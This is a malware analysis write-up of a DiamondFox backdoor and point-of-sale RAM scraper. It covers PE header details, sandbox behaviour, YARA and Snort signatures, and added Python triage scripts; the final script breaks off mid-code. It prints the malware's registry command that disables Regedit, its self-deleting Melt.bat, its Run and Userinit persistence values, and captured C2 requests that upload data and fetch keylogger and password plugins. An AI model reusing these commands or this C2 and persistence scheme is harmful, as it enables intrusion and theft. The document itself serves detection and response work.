Source: VirusShare
Malware Family: Backdoor, Implant, RAM Scraper
Static Analysis Tools: pestudio, Immunity Debugger, CFF Explorer, PEiD, BinText, IDA Pro
Dynamic Analysis Tools: pexplorer, ProcMon, RegShot, ProcDump, Autoruns, Wireshark, Sandboxie, VMware, Comodo, Payload Security

Sandbox Reports:
(1) Comodo: http://camas.comodo.com/cgi-bin/submit?file=4dae7fcde64a7ed61c51b17a57ffd2510381271a53d59beee730f59ae6c75352
(2) VirusTotal: https://www.virustotal.com/en/file/74fe8c68d878cc9699a2781be515bb003931ffa2ad21dc0c2c48eb91caba4b44/analysis/1450745229/

I. Static Analysis:

Filename: loader.exe
File Type: Win32 EXE
Original Name: лиса.Dll ("fox" in Russian)
Product: NT Kernel & System
Target machine: Intel 386 or later processors and compatible processors
Compilation Timestamp: 2015-06-18 04:37:16
Entry Point: 0x000011FC
Subsystem: Windows GUI
Number of Sections: 3
File Info: Microsoft Visual Basic 6.0 (when unpacked)
MD5: 6b5f4ffa711a2d1e4f27455f6d0f09ad
SHA256: 4dae7fcde64a7ed61c51b17a57ffd2510381271a53d59beee730f59ae6c75352
File size: 80.0 KB (81920 bytes)

PE imports:
[+] MSVBVM60.DLL (Microsoft Visual Basic Library)

PE resources by language: ARABIC NEUTRAL (SYRIA)

Red Flags:
- The count (95) of blacklisted strings reached the maximum (30) threshold.
- The offset (0x00000000) of the Bound Import Directory is outside a section.
- The file contains 1 resource(s) in a blacklisted language (Syria).
- The count (1) of imported libraries reached the minimum (3) threshold.
- The count (12) of imported blacklisted functions reached the maximum (1) threshold.
- The file references child processes.
- The file ignores Data Execution Prevention (DEP) as a mitigation technique.
- The file ignores Address Space Layout Randomization (ASLR) as a mitigation technique.
- The file runs in the Visual Basic Virtual Machine.
- The original filename is different than the file name (loader).
- The file ignores cookies on the stack (GS) as a mitigation technique.
- The file is not signed with a Digital Certificate.
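Several of the red flags above (machine type, section count, build timestamp, entry point, subsystem, and the missing DEP/ASLR opt-in bits) are read straight out of the PE header. The following Python is an added example, not the post's own code or pestudio output: it walks the DOS header, PE signature, COFF header, PE32 optional header and section table and reports the header-level subset of those indicators. The header bytes are constructed in build_sample_header() to carry the values reported for loader.exe (i386, 3 sections, 2015-06-18 04:37:16, entry 0x11FC, GUI, DllCharacteristics 0); the section names and sizes are invented, and nothing is taken from the real sample.

```python
"""PE header triage for the red flags listed above. Added example; the header bytes are
constructed below to mirror the reported values for loader.exe, not read from the sample."""
import struct
from datetime import datetime, timezone

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x010B
IMAGE_SUBSYSTEM_WINDOWS_GUI = 2
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # DEP opt-in
MACHINE_NAMES = {0x014C: "Intel 386 or later", 0x8664: "x64", 0x01C4: "ARM"}
SUBSYSTEM_NAMES = {1: "Native", 2: "Windows GUI", 3: "Windows CUI"}


def parse_pe_header(data: bytes) -> dict:
    """DOS header -> PE signature -> COFF header -> PE32 optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        raise ValueError("only PE32 (32-bit) images handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]          # AddressOfEntryPoint
    subsystem, dllchars = struct.unpack_from("<HH", data, opt + 68)  # Subsystem, DllCharacteristics
    sections = []
    for i in range(nsections):
        off = opt + opt_size + i * 40
        name, vsize, va, rawsize = struct.unpack_from("<8sIII", data, off)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, max(vsize, rawsize)))
    entry_section = next((n for n, va, size in sections if va <= entry < va + size), None)
    return {
        "machine": machine,
        "machine_name": MACHINE_NAMES.get(machine, hex(machine)),
        "sections": nsections,
        "timestamp": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "entry_point": entry,
        "entry_point_section": entry_section,
        "subsystem": SUBSYSTEM_NAMES.get(subsystem, str(subsystem)),
        "dll_characteristics": dllchars,
    }


def red_flags(info: dict) -> list:
    """Header-level subset of the indicators a tool like pestudio reports."""
    flags = []
    if not (info["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_NX_COMPAT):
        flags.append("ignores DEP (NX_COMPAT not set)")
    if not (info["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE):
        flags.append("ignores ASLR (DYNAMIC_BASE not set)")
    if info["entry_point_section"] is None:
        flags.append("entry point outside every section")
    return flags


def build_sample_header() -> bytes:
    """Constructed PE32 header: i386, 3 sections, 2015-06-18 04:37:16 UTC, entry 0x11FC,
    GUI subsystem, DllCharacteristics 0. Section names and sizes are invented."""
    ts = int(datetime(2015, 6, 18, 4, 37, 16, tzinfo=timezone.utc).timestamp())
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 3, ts, 0, 0, 224, 0x010F)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, IMAGE_NT_OPTIONAL_HDR32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x11FC)                       # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                     # ImageBase
    struct.pack_into("<HH", opt, 68, IMAGE_SUBSYSTEM_WINDOWS_GUI, 0)  # no NX/ASLR bits
    struct.pack_into("<I", opt, 92, 16)                           # NumberOfRvaAndSizes
    table = b""
    for name, va in ((b".text", 0x1000), (b".data", 0x2000), (b".rsrc", 0x3000)):
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), 0x1000, va, 0x1000, 0, 0, 0, 0, 0, 0)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


if __name__ == "__main__":
    info = parse_pe_header(build_sample_header())
    for key, value in info.items():
        print(f"{key}: {value}")
    for flag in red_flags(info):
        print("RED FLAG:", flag)
```

The GS (stack cookie) and import-count indicators are not visible in the headers alone; they need the import table and the code itself, which is why pestudio lists them separately from the DllCharacteristics-derived flags.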
Here are some interesting strings:

*Anti-Sysanalizer: Protect the bot against Sysanalizer.
*Anti-VirtualBox: Protect the bot against Virtual Box Emulation.
*Anti-VMWare: Protect the bot against VMWare Emulation.
*Anti-Anubis: Protect the bot against Anubis Online Analyzer.
*Anti-OllyDBG: Protect the bot against be analyzed with OllyDBG.
*Anti-Sandboxie: Protect the bot against be executed in Sandboxie.
*Anti-Malwr.com: Protect the bot against Malwr.com Online Analyzer.
*Anti-Wine: Protect the bot against Linux emulation.
*Anti-Norman: Protect the bot against Norman Sandbox.
*Disable Regedit: Disable the registry editor.
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d "1" /f

II. Dynamic Analysis:

Incident Response summary:
Remote Access: Contains ability to listen for incoming connections
Spyware/Leak: POSTs files to a webserver
Persistence: Modifies auto-execute functionality by setting/creating a value in the registry
Fingerprint: Reads the cryptographic machine GUID; Contains ability to lookup the Windows account name
Network Behavior: Contacts 1 domain and 1 host.
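The persistence artefacts the sandbox report attributes to the dropped svchost.exe (a Run value "SVCHOST" pointing at %APPDATA%\svchost.exe, a second program appended to the Winlogon Userinit value, and WordPad.exe written into the user's Startup folder) are what a responder checks first on other hosts. The following Python is an added example, not part of the post or of the sandbox output: it applies three triage rules to registry values and a Startup-folder listing passed in as plain strings, so it runs offline. The input is constructed from the report's values; on a live host the same strings would come from winreg and os.listdir. The expected Userinit program, the user-writable path markers and the system-binary name watchlist are assumptions of the example.

```python
"""Persistence triage for the Run / Userinit / Startup-folder artefacts reported above.
Added example; values are supplied as strings (constructed from the report) so it runs offline."""

# Constructed environment mapping used to expand the report's %VAR% notation.
ENV = {
    "%APPDATA%": "C:\\Users\\alice\\AppData\\Roaming",
    "%USERNAME%": "alice",
    "%TEMP%": "C:\\Users\\alice\\AppData\\Local\\Temp",
}
# Assumed: the only legitimate program in Userinit on a stock Windows install.
EXPECTED_USERINIT = "c:\\windows\\system32\\userinit.exe"
# Assumed path fragments (lower-case) marking user-writable locations.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\temp\\", "\\users\\public\\")
# Assumed watchlist of Windows binary names that malware commonly borrows.
SYSTEM_BINARY_NAMES = {"svchost.exe", "dwm.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "explorer.exe"}


def expand(path: str) -> str:
    """Substitute the constructed %VAR% values, strip quotes, normalise to lower case."""
    for var, value in ENV.items():
        path = path.replace(var, value)
    return path.strip().strip('"').lower()


def check_userinit(value: str) -> list:
    """Userinit is a comma-separated list; anything besides userinit.exe runs at every logon."""
    findings = []
    for entry in value.split(","):
        entry = entry.strip()
        if entry and expand(entry) != EXPECTED_USERINIT:
            findings.append(("HKLM\\...\\Winlogon\\Userinit", entry, "extra program chained after userinit.exe"))
    return findings


def check_run_values(values: dict) -> list:
    """Flag Run entries whose image lives in a user-writable path or borrows a system binary name."""
    findings = []
    for name, command in values.items():
        image = expand(command)
        reasons = []
        if any(marker in image for marker in USER_WRITABLE):
            reasons.append("image in user-writable path")
        basename = image.rsplit("\\", 1)[-1]
        if basename in SYSTEM_BINARY_NAMES and not image.startswith("c:\\windows\\"):
            reasons.append("system binary name outside C:\\Windows")
        if reasons:
            findings.append(("HKCU\\...\\Run\\" + name, command, "; ".join(reasons)))
    return findings


def check_startup_folder(entries: list) -> list:
    """Any executable content in the per-user Startup folder runs at logon."""
    return [("Startup folder", f, "executable in Startup folder")
            for f in entries if f.lower().endswith((".exe", ".bat", ".cmd", ".vbs", ".scr"))]


def triage(userinit: str, run_values: dict, startup_entries: list) -> list:
    """Run all three checks and return (location, value, reason) tuples."""
    return check_userinit(userinit) + check_run_values(run_values) + check_startup_folder(startup_entries)


# Constructed input mirroring the values the sandbox report attributes to svchost.exe.
SAMPLE_USERINIT = "C:\\Windows\\system32\\Userinit.exe,C:\\Users\\%USERNAME%\\AppData\\Roaming\\svchost.exe"
SAMPLE_RUN = {"SVCHOST": "%APPDATA%\\svchost.exe"}
SAMPLE_STARTUP = ["WordPad.exe", "desktop.ini"]

if __name__ == "__main__":
    for location, value, reason in triage(SAMPLE_USERINIT, SAMPLE_RUN, SAMPLE_STARTUP):
        print(f"{location}: {value}  <- {reason}")
```

The Userinit check is the one most often missed: a stock value ends in a trailing comma with a single program, so any second entry is worth pulling, whatever it is called.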
Install Path: ~APPDATA ~Temp ~Program Files ~WinDir
StartUp: ~HKCY ~WinLogon ~Startup

Platform Intelligence Report (Payload Security sandbox)

Behavior Comparison
Sample contains signature combinations unique to malicious reports:
- Writes data to a remote process; Sets the process error mode to suppress error box; Modifies the UAC/LUA settings (Account Control). Relevance: seen 68 times before on malicious reports.
- Writes data to a remote process; Allocates virtual memory in foreign process; Modifies the UAC/LUA settings (Account Control). Relevance: seen 43 times before on malicious reports.
- Uses a User Agent typical for browsers, although no browser was ever launched; Creates/touches files in windows directory; Writes data to a remote process. Relevance: seen 41 times before on malicious reports.
- Writes data to a remote process; Drops a batch file that contains a force-delete command (typical for malware init code); Sets the process error mode to suppress error box. Relevance: seen 35 times before on malicious reports.
- Marks file for deletion; Writes data to a remote process; Modifies the UAC/LUA settings (Account Control). Relevance: seen 21 times before on malicious reports.
- Accesses potentially sensitive information from local browsers; Creates/touches files in windows directory; Writes data to a remote process. Relevance: seen 19 times before on malicious reports.
... and at least 10 more combinations

Installation/Persistence
Allocates virtual memory in foreign process (source: API Call):
- "<Input Sample>" allocated 00000088 bytes of memory in "cmd.exe" (Protection: "read/write")
- "svchost.exe" allocated 00000088 bytes of memory in "ntvdm.exe" (Protection: "read/write")
Writes a PE file header to disc (source: API Call):
- "<Input Sample>" wrote 65024 bytes starting with PE header signature to file "%APPDATA%\svchost.exe": 4d5a90000300000004000000ffff0000b8000000000000004000000000000000000000000000000000000000000000000000 ...
- "svchost.exe" wrote 65024 bytes starting with PE header signature to file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WordPad.exe": 4d5a90000300000004000000ffff0000b8000000000000004000000000000000000000000000000000000000000000000000 ...
- "svchost.exe" wrote 65024 bytes starting with PE header signature to file "C:\Users\%USERNAME%\AppData\Roaming\dwm.exe": 4d5a90000300000004000000ffff0000b8000000000000004000000000000000000000000000000000000000000000000000 ...
Writes data to a remote process (source: API Call):
- "<Input Sample>" wrote 32 bytes to a foreign process "svchost.exe" (PID: 00002164)
- "<Input Sample>" wrote 52 bytes to a foreign process "svchost.exe" (PID: 00002164)
- "<Input Sample>" wrote 4 bytes to a foreign process "svchost.exe" (PID: 00002164)
- "svchost.exe" wrote 32 bytes to a foreign process "ntvdm.exe" (PID: 00003132)
- "svchost.exe" wrote 52 bytes to a foreign process "ntvdm.exe" (PID: 00003132)
- "svchost.exe" wrote 4 bytes to a foreign process "ntvdm.exe" (PID: 00003132)

Spyware/Information Retrieval
Accesses potentially sensitive information from local browsers (source: Touched Handle):
- "svchost.exe" had access to "%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5" (Type: "FileHandle", Context: "NtSetInformationFile")

Suspicious Indicators

Anti-Detection/Stealthyness
Possibly checks for the presence of an Antivirus engine (source: String):
- "No Antivirus" (Indicator: "antivirus")
- "ANTIVIRUS" (Indicator: "antivirus")
Sets the process error mode to suppress error box (source: API Call):
- "<Input Sample>" set its error mode to SEM_NOOPENFILEERRORBOX
- "svchost.exe" set its error mode to SEM_NOOPENFILEERRORBOX

Environment Awareness
Contains ability to query the machine version:
- [email protected]
Reads the cryptographic machine GUID (source: Registry Access):
- "<Input Sample>" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY", Key: "MACHINEGUID")
- "svchost.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY", Key: "MACHINEGUID")

General
POSTs files to a webserver (source: Network Traffic):
- "POST /post.php?pl=&slots=1 HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Xu02=$ Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 121 Host: locahost.com" with no payload
- "POST /post.php?pl=&slots=1 HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Xu02=$ Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 122 Host: locahost.com" with no payload
- "POST /post.php?pl=&slots=1 HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Xu02=$ Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 120 Host: locahost.com" with no payload
Reads configuration files (source: API Call):
- "svchost.exe" read file "C:\Users\desktop.ini"
- "svchost.exe" read file "C:\Users\%USERNAME%\desktop.ini"
- "svchost.exe" read file "C:\Users\%USERNAME%\Desktop\desktop.ini"
- "svchost.exe" read file "%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\desktop.ini"
- "svchost.exe" read file "C:\Users\%USERNAME%\Desktop\desktop.ini"
- "svchost.exe" read file "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini"
- "svchost.exe" read file "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini"
- "svchost.exe" read file "C:\Windows\Fonts\desktop.ini"
- "svchost.exe" read file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini"

Installation/Persistence
Creates/touches files in windows directory (source: API Call):
- "svchost.exe" created file "%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu"
- "svchost.exe" created file "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
- "svchost.exe" created file "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini"
- "svchost.exe" created file "C:\Windows\Fonts\desktop.ini"
- "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini"
- "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini"
- "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu"
- "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
- "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WordPad.exe"
- "svchost.exe" created file "C:\Windows\system32\wshom.ocx"
- "svchost.exe" created file "C:\Windows\System32\msxml3.dll\1"
- "svchost.exe" created file "C:\Windows\System32\msxml3.dll"
- "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files"
- "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Cookies"
- "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\History"
- "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat"
- "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Cookies\index.dat"
Drops executable files (source: Dropped File):
- "svchost.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows"
- "WordPad.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows"
- "dwm.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows"
Modifies auto-execute functionality by setting/creating a value in the registry (source: Registry Access):
- "svchost.exe" (Access type: "CREATE", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN")
- "svchost.exe" (Access type: "SETVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN", Key: "SVCHOST", Value: "%APPDATA%\svchost.exe")
- "svchost.exe" (Access type: "SETVAL", Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON", Key: "USERINIT", Value: "C:\Windows\system32\Userinit.exe,C:\Users\%USERNAME%\AppData\Roaming\svchost.exe")
Monitors specific registry key for changes (source: API Call):
- "svchost.exe" monitors "\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9" (Filter: 1, Subtree: 2147483648)
- "svchost.exe" monitors "\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\NameSpace_Catalog5" (Filter: 1, Subtree: 2147483648)
- "svchost.exe" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\svchost_RASAPI32" (Filter: 14, Subtree: 2147483648)
- "svchost.exe" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\svchost_RASMANCS" (Filter: 14, Subtree: 2147483648)
Writes a file to the start menu (source: API Call):
- "svchost.exe" wrote 65024 bytes to file "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WordPad.exe"

Network Related
Contains ability to listen for incoming connections:
- listen@WS2_32.DLL (Referenced in the context of a system call)
- [email protected]
Uses a User Agent typical for browsers, although no browser was ever launched (source: Network Traffic):
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

System Destruction
Marks file for deletion (source: API Call):
- "%APPDATA%\svchost.exe" marked "C:\Users\%USERNAME%\AppData\Roaming\Flog.log" for deletion
- "C:\Users\%USERNAME%\AppData\Roaming\svchost.exe" marked "C:\Users\%USERNAME%\AppData\Roaming\Elog.log" for deletion
- "C:\Users\%USERNAME%\AppData\Roaming\svchost.exe" marked "C:\Users\%USERNAME%\AppData\Roaming\grabbed.log" for deletion
Opens file with deletion access rights (source: API Call):
- "svchost.exe" opened "%APPDATA%\Flog.log" with delete access
- "svchost.exe" opened "C:\Users\%USERNAME%\AppData\Roaming\Elog.log" with delete access
- "svchost.exe" opened "C:\Users\%USERNAME%\AppData\Roaming\grabbed.log" with delete access

System Security
Modifies proxy settings (source: Registry Access):
- "svchost.exe" (Access type: "SETVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYENABLE", Value: "00000000")
- "svchost.exe" (Access type: "DELETEVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYSERVER")
- "svchost.exe" (Access type: "DELETEVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYOVERRIDE")
- "svchost.exe" (Access type: "DELETEVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS")
- "svchost.exe" (Access type: "DELETEVAL", Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS")

Informative

Environment Awareness
Executes WMI queries (source: API Call):
- "svchost.exe" issued a query "select * from win32_logicaldisk"

General
Contacts domains (source: Network Traffic):
- "locahost.com"
Contacts server (source: Network Traffic):
- "209.191.187.61:80"
Creates a writable file in a temporary directory (source: API Call):
- "<Input Sample>" created file "%TEMP%\Melt.bat"
Creates mutants (source: Created Mutant):
- "Local\_!MSFTHISTORY!_"
- "Local\c:!users!_____!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
- "Local\c:!users!_____!appdata!roaming!microsoft!windows!cookies!"
- "Local\c:!users!_____!appdata!local!microsoft!windows!history!history.ie5!"
- "Local\WininetStartupMutex"
- "Local\WininetConnectionMutex"
- "Local\WininetProxyRegistryMutex"
- "Local\!IETld!Mutex"
- "Local\ZonesCounterMutex"
- "Local\ZoneAttributeCacheCounterMutex"
- "Local\ZonesCacheCounterMutex"
- "Local\ZonesLockedCacheCounterMutex"
- "IESQMMUTEX_0_208"
GETs files from a webserver (source: Network Traffic):
- "GET /plugins/keylogger.p HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: locahost.com Connection: Keep-Alive"
- "GET /plugins/ftp.p HTTP/1.1 User-Agent: vb wininet Host: locahost.com"
- "GET /plugins/mail.p HTTP/1.1 User-Agent: vb wininet Host: locahost.com"
- "GET /plugins/passwords.p HTTP/1.1 User-Agent: vb wininet Host: locahost.com"
- "GET /plugins/POS.p HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: locahost.com Connection: Keep-Alive"
Loads modules at runtime (source: API Call):
- "svchost.exe" loaded module "API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL" at base 77B10000
- "svchost.exe" loaded module "PROFAPI.DLL" at base 75AE0000
- "svchost.exe" loaded module "PROPSYS.DLL" at base 74860000
- "svchost.exe" loaded module "C:\WINDOWS\SYSTEM32\MSXML3.DLL" at base 6B9D0000
- "svchost.exe" loaded module "%COMMONPROGRAMFILES%\SYSTEM\ADO\MSADO15.DLL" at base 6B8D0000
- "svchost.exe" loaded module "URLMON.DLL" at base 76EE0000
- "svchost.exe" loaded module "WININET.DLL" at base 76090000
- "svchost.exe" loaded module "COMCTL32.DLL" at base 74960000
- "svchost.exe" loaded module "SHELL32.DLL" at base 76290000
- "svchost.exe" loaded module "VERSION.DLL" at base 750D0000
- "svchost.exe" loaded module "RASAPI32.DLL" at base 73400000
- "svchost.exe" loaded module "RTUTILS.DLL" at base 73FA0000
- "svchost.exe" loaded module "RASMAN.DLL" at base 733E0000
- "svchost.exe" loaded module "SHLWAPI.DLL" at base 75E10000
- "svchost.exe" loaded module "SENSAPI.DLL" at base 70C10000
- "svchost.exe" loaded module "RPCRT4.DLL" at base 77120000
Loads the Visual Basic runtime environment (source: Loaded Module):
- "<Input Sample>" loaded module "%WINDIR%\system32\MSVBVM60.DLL" at 72940000
- "svchost.exe" loaded module "C:\Windows\system32\MSVBVM60.DLL" at 72940000
Runs shell commands (source: Monitored Target):
- "cmd /c %TEMP%\Melt.bat" on 2015-12-23.19:32:39
Spawns new processes (source: Monitored Target):
- Spawned process "svchost.exe" with commandline "%APPDATA%\svchost.exe" (UID: 00118484-00002164)
- Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\Melt.bat" (UID: 00129156-00001836)
- Spawned process "ntvdm.exe" with commandline "-i1" (UID: 00252968-00003132)

Installation/Persistence
Contains ability to lookup the Windows account name:
- [email protected] (Referenced in the context of a system call)
- [email protected] (Referenced in the context of a system call)
Dropped files (source: Dropped File):
- "svchost.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows"
- "WordPad.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows"
- "Melt.bat" has type "DOS batch file, ASCII text, with CRLF line terminators"
- "ky.config" has type "data"
- "logger.p" has type "HTML document, ASCII text"
- "dwm.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows"
- "POS.exe" has type "HTML document, ASCII text"
- "scsE0EB.tmp" has type "ASCII text, with CRLF line terminators"
- "scsE10B.tmp" has type "DOS batch file, ASCII text, with CRLF line terminators"
Found potential URL in binary/memory (source: String):
- Pattern match: "pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"
- Pattern match: "http://locahost.com/plugins/POS.p"
- Pattern match: "http://localhost/plugins/POS.p"
- Pattern match: "http://localhost/"
- Pattern match: "http://twitter.com/samfosteriam"
- Pattern match: "http://www.amazon.com/exec/obidos/redirect-home/locahostcom-20"
- Pattern match: "http://www.amazon.com/exec/obidos/ASIN/0395714060/locahostcom-20"
- Pattern match: "http://www.cafeshops.com/locahost01/"
- Pattern match: "https://ssl"
- Pattern match: "http://locahost.com/plugins/keylogger.p"
- Pattern match: "http://localhost/plugins/keylogger.p"

Here is the Melt.bat script:

@echo off
del /F "Z:\loader.exe"
del /F "C:\Users\_____\AppData\Local\Temp\Melt.bat"

Oddity: here is the dump of "Pos.exe":

III. Yara Signature:
rule Backdoor_Win32_DiamondFox : Implant
{
    meta:
        author = "Vitali Kremez"
        date = "2015-12-23"
        description = "Detected Gorynych DiamondFox Implant"
        hash0 = "6b5f4ffa711a2d1e4f27455f6d0f09ad"
        sample_filetype = "exe"
    strings:
        $string0 = "loader.exe"
        $string1 = "Melt.bat"
        $string2 = "<Panel>" wide
        $string3 = "VM_WINXP" wide
        $string4 = "plugins/keylogger.p" wide
        $string5 = "</ABox>" wide
        // $string6 is cut off after "root\\" in the archived post; the closing quote is added so the rule compiles
        $string6 = "winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\"
        $string7 = "<Time>" wide
        $string8 = "MY_PATH"
        $string9 = "cript.Sleep(2000)"
        $string10 = "</Boxie>" wide
        $string11 = "SHELL32"
        $string12 = "& chr(34)" wide
        $string13 = "</USB>" wide
        $string14 = "Shell.Application" wide
        $string15 = "CUSTOM" wide
        $string16 = "\\Armory\\" wide
        $string17 = "C_DATA"
    condition:
        6 of ($string*) and filesize < 81KB
}

Sourcefire (Snort) Rule:

# sid/rev were absent from the rule as posted and are added as local placeholders; ";" inside content is escaped as "\;", the pcre delimiters are escaped, and "noncase" is corrected to "nocase"
alert tcp any any -> any 80 (msg:"DiamondFox Backdoor Alert"; flow:to_server,established; content:"/plugins/keylogger.p"; pcre:"/\/plugins\/.*/"; pcre:"/.*pl=\&slots.*/"; content:"User-Agent: Mozilla/4.0 (compatible\; MSIE 7.0\; Windows NT 6.1\; Trident/4.0\; SLCC2\; .NET CLR 2.0.50727\; .NET CLR 3.5.30729\; .NET CLR 3.0.30729\; Media Center PC 6.0\; .NET4.0C\; .NET4.0E)"; nocase; classtype:trojan-activity; sid:10001; rev:1;)

Sourcefire Exfil Rule:

alert tcp any any <> 209.191.187.61 80 (msg:"DiamondFox C2 Connect"; sid:10002;)
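The traffic indicators behind the Snort rules can also be applied as host- or proxy-side detection logic over raw HTTP request text of the kind the sandbox captured. The following Python is an added example, not part of the post: it parses a request head and checks each indicator independently (a GET for /plugins/<name>.p, a POST to /post.php carrying pl= and slots= in the query, the two non-browser user agents, the fixed multipart boundary Xu02=$, and the C2 host locahost.com). Checking them independently matters because content and pcre options inside one Snort rule are ANDed, and in the captured traffic the keylogger.p download (MSIE user agent) and the pl=&slots= upload (WinHttpRequest user agent) occur in different requests. The sample requests are constructed after the report's captures; the indicator names and the two-hit threshold are the example's own.

```python
"""Indicator checks for the DiamondFox C2 traffic shown in the report, applied to raw HTTP
request text. Added example; the requests below are constructed after the sandbox captures."""
import re
from urllib.parse import urlsplit, parse_qs

KNOWN_C2_HOSTS = {"locahost.com"}                       # from the report
PLUGIN_PATH = re.compile(r"^/plugins/[\w.-]+\.p$", re.IGNORECASE)
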